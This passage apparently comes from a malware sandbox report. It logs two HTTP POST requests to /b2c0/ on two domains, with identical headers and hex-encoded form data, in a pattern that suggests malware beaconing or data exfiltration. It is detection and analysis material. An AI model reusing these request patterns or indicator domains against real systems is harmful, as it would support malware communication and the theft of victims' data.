      Source: global trafficHTTP traffic detected: POST /b2c0/ HTTP/1.1Host: www.aydeyahouse.comConnection: closeContent-Length: 131140Cache-Control: no-cacheOrigin: http://www.aydeyahouse.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.aydeyahouse.com/b2c0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 36 6c 3d 4e 49 36 30 68 52 71 6d 43 43 54 46 68 69 79 44 73 30 63 53 47 70 48 30 39 6a 77 62 42 70 78 76 44 68 30 6f 62 48 36 5a 44 65 35 74 46 69 4b 59 78 37 72 54 44 73 59 68 54 61 4f 46 61 35 46 31 4e 34 49 56 36 5f 66 6b 69 52 4e 61 58 79 75 66 4b 48 4e 68 62 41 56 56 4e 66 54 59 5a 45 6f 43 43 49 46 4d 53 6e 50 62 6c 6e 31 51 73 49 68 6e 53 6e 77 68 37 6c 58 38 67 43 70 34 6a 46 64 38 58 43 37 70 70 56 6d 51 43 76 37 45 4a 32 4f 39 34 52 64 31 48 73 47 6c 67 77 32 36 28 2d 69 33 63 77 45 35 57 69 37 56 4e 38 4d 45 49 74 36 34 6a 72 49 71 4e 45 68 54 45 6c 4d 6b 6d 36 76 2d 38 63 4f 30 46 70 57 6a 52 71 4e 53 4e 36 36 5f 41 75 4d 34 7a 37 52 78 28 74 41 32 76 45 66 75 69 78 77 4f 68 30 58 2d 76 2d 6a 35 47 38 6f 6a 41 76 70 65 43 35 34 37 6c 64 5a 6e 70 78 4e 43 55 76 76 47 28 46 77 50 6d 50 49 61 6d 6d 57 66 78 64 78 44 45 6a 7a 4c 54 53 31 77 47 41 6a 33 46 64 36 70 6b 66 34 66 7e 4a 78 42 67 70 57 65 57 46 64 68 53 79 53 36 44 41 76 67 7e 50 6e 2d 79 31 74 55 55 6b 33 32 66 5f 65 5f 67 4a 42 47 43 4e 79 35 4f 5a 61 76 51 37 4e 30 37 76 53 76 30 4f 37 76 6f 58 43 55 4b 49 68 77 4a 57 74 61 6b 5f 38 78 28 58 79 4e 78 55 64 6a 6d 50 59 38 75 67 51 30 39 44 4d 6b 52 45 72 4f 4f 6e 57 5f 39 69 39 6d 54 73 49 75 79 45 36 49 71 42 7e 30 35 4b 36 69 35 61 66 4c 67 4a 54 63 68 4d 72 33 52 37 4b 38 6c 42 6b 34 61 69 65 2d 66 4b 79 54 30 41 31 57 63 62 7e 5a 64 4c 65 33 33 75 71 64 6b 54 56 75 52 50 68 59 71 2d 6a 6f 63 75 34 71 79 4e 56 44 39 74 4c 63 49 42 64 6e 69 48 72 37 5a 48 34 48 7a 30 49 5f 38 74 39 66 55 5a 76 54 70 30 4d 56 5a 61 51 71 34 4e 48 44 6a 6f 39 62 74 70 64 34 70 62 72 41 43 4e 4c 37 49 55 76 7a 61 51 6a 2d 58 75 61 51 74 6a 52 51 67 77 75 63 4d 6c 43 68 44 65 55 5f 65 5a 46 62 6a 37 39 74 35 50 62 6f 7a 55 66 77 57 5a 44 65 5a 70 76 38 6d 52 56 73 39 58 4f 5a 4b 67 6e 70 52 62 31 71 51 44 7e 54 79 4e 61 71 4c 72 51 37 73 74 64 52 6c 50 48 47 67 74 41 4e 66 49 38 72 74 4d 41 5a 63 5f 4c 6e 66 54 45 36 30 37 36 48 41 45 58 70 68 6d 42 76 7e 62 6a 59 30 58 6e 57 63 6c 65 67 67 33 28 48 79 63 7a 47 78 52 53 48 78 43 78 57 68 5a 55 52 51 34 69 68 39 63 32 31 61 4a 33 59 49 75 7a 53 71 33 35 5f 63 70 32 66 65 58 69 71 30 48 38 70 77 5a 6d 67 56 37 70 37 41 71 34 33 76 37 4c 32 28 62 64 36 46 6c 6c 57 73 34 5a 50 61 74 32 4c 79 63 62 76 55 43 76 31 42 41 31 67 35 37 72 63 74 76 32 62 67 4d 6d 5a 59 34 61 7a 56 49 62 42 4a 69 5a 59 6f 37 41 69 4a 6d 30 57 28 7a 4b 75 6e 70 48 38 6a 77 47 43 51 30 4a 6d 6c 38 36 49 6d 69 50 37 7a 65 6b 70 79 37 49 59 6f 67 57 36 4a 4a 49 72 37 7a 55 50 39 6a 32 69 45 49 78 44 28 64 4e 4f 71 57 31 6a
      Source: global trafficHTTP traffic detected: POST /b2c0/ HTTP/1.1Host: www.itpronto.comConnection: closeContent-Length: 131140Cache-Control: no-cacheOrigin: http://www.itpronto.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.itpronto.com/b2c0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 36 6c 3d 79 73 4b 5f 34 54 6d 4a 4b 7a 50 5a 78 4d 38 33 67 76 70 6d 6b 6b 4b 46 67 77 32 4d 6d 5a 70 63 30 42 6b 36 30 44 45 75 64 67 63 7a 45 65 45 74 4b 77 75 6a 76 36 31 53 4d 44 7e 71 45 49 43 71 34 55 4a 75 43 6b 33 55 4c 6d 79 4c 4c 57 42 33 7e 2d 68 31 71 6a 7e 78 78 61 43 65 65 58 67 31 56 38 42 57 28 68 53 5f 33 56 6c 33 39 4c 6c 36 6a 68 4d 6f 57 58 41 43 55 41 48 71 5a 63 42 74 74 41 79 67 6e 48 74 77 6b 6b 41 36 4b 2d 53 6a 61 45 42 6d 55 31 50 35 35 77 4c 43 76 47 34 65 55 30 65 37 59 64 55 51 6c 7a 76 78 59 52 62 38 4e 65 7e 57 32 36 66 79 72 46 6b 78 4d 73 42 79 67 56 78 4f 79 75 7e 78 78 5f 52 32 6d 4f 32 4e 73 71 5a 4b 4f 75 30 2d 69 4b 51 54 61 57 57 35 41 74 4a 51 71 38 6f 57 74 7a 78 34 6d 56 48 32 67 7a 51 58 4c 6d 68 61 33 70 74 75 4a 63 5a 50 47 34 46 39 53 51 4b 31 64 71 59 41 34 32 6c 70 4c 50 53 4c 62 6f 5a 69 4d 44 4d 55 78 6a 6e 4e 4b 52 43 54 52 69 66 79 6c 68 28 75 39 61 4f 51 6e 4a 58 46 4c 77 59 30 33 64 6b 5a 62 44 7e 5a 53 44 67 34 7a 32 31 63 64 6e 6a 47 35 58 63 4e 76 49 53 48 61 6e 52 57 54 52 58 5a 55 57 70 38 67 6f 33 31 72 33 78 37 4f 72 6e 6b 72 49 72 5f 5a 44 28 78 47 54 72 5a 7a 64 72 34 64 33 49 42 4f 64 62 6b 4d 56 76 65 32 77 69 6b 4f 31 68 38 32 76 30 78 6d 56 6b 54 4a 56 63 79 28 46 6f 42 64 64 30 38 7e 64 37 35 6e 66 49 69 53 70 61 43 44 32 47 49 48 58 6f 6b 32 41 6a 32 4e 39 47 58 7e 4d 31 4d 66 31 41 4b 77 63 63 66 39 76 7a 41 76 54 45 63 35 52 72 6a 4e 5a 35 33 6d 38 38 6d 30 44 71 4d 74 64 6e 5f 51 53 54 57 79 65 48 36 77 70 74 66 39 38 5a 53 6d 2d 30 6a 72 7a 64 61 42 5a 50 57 56 4b 75 50 67 73 30 54 46 57 59 33 34 54 36 46 4c 41 79 6e 37 63 52 69 65 56 6a 48 43 6e 61 71 6e 36 53 54 38 4a 7e 49 28 6f 47 34 65 51 30 66 52 2d 71 61 47 6e 33 51 32 6d 5a 76 34 2d 74 51 74 61 57 47 73 57 71 35 33 6c 31 47 6e 6c 59 46 67 53 6a 6f 37 56 73 38 73 45 4a 42 47 4d 32 55 53 4d 35 59 4b 43 49 44 42 75 4b 4f 5a 7a 43 55 6a 73 54 6e 7e 34 48 43 49 6e 71 36 43 4f 6c 76 67 61 6d 45 6a 6d 71 64 56 4f 53 73 6c 6f 78 65 76 30 69 35 6e 45 49 58 73 37 72 39 39 69 37 35 47 65 62 30 46 6e 58 76 34 55 41 73 53 48 54 59 67 66 7e 2d 79 70 4a 44 34 43 70 71 73 3